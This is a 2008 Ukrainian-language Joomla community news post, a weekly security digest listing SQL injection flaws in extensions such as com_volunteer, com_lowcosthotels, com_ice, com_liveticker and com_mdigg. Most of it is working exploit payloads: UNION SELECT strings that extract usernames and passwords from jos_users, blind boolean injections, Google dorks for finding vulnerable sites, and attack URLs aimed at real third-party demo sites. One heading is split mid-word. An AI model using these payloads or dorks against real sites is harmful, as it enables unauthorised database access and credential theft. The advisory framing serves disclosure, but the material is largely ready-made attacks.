Joomla! Україна

Дізнавайся про останні події української та світової спільноти
  • Версія Joomla! 5.1.0 від 16.04.2024
  • 60 записи в блогах
  • 791 новини та статті
     

Тижневик безпеки №01

28.12.2008, 03:53  |  Новини розширень Joomla!  |  Денис Носов

За тиждень, який минає знайдено вразливості у наступних розширеннях: mdigg 2.2.8, Live Ticker 1.0, Ice Gallery 0.5b2, com_allhotels, com_lowcosthotels, Volunteer 2.0.

com_volunteer (job_id) SQL-ін’єкція

Приклад:

http://localhost/Path/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=[exploit]

Експойт: 

-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--

Демо: 

http://demolegacy.joomlaapps.com/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--&filter=&city_id=&function_id=&limit=5&pageno=1

com_lowcosthotels (id) SQL-ін’єкція

Скрипт: http://www.joomlahbs.com/ DorK: inurl:index.php?option=com_lowcosthotels Демо:

com_allhote 

http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4%20%20%20
http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5

ls (id) SQL-ін’єкція

Скрипт:

http://www.joomlahbs.com/  та  http://www.leveltensolutions.net/spa/

DorK: inurl:index.php?option=com_allhotels

Демо: 

http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=5

com_ice (catid) SQL-ін’єкція

Приклад:

http://localHost/path/index.php?option=com_ice&⁞catid=1[SQL code]

SQL код: 

and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96

com_liveticker (tid) SQL-ін’єкція

Приклад:

http://localHost/path/index.php?option=com_liveticker&task=viewticker&tid=[SQL]

Демо: 

http://www.komponenten.joomlademo.de/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=4   >>(False)
http://www.komponenten.joomlademo.de/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=5   >>(True)

com_mdigg (category) SQL-ін’єкція

Приклад:

http://localHost/path/index.php?option=com_mdigg&act=story_lists&task=view&category=[exploit]

Експойт: 

-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*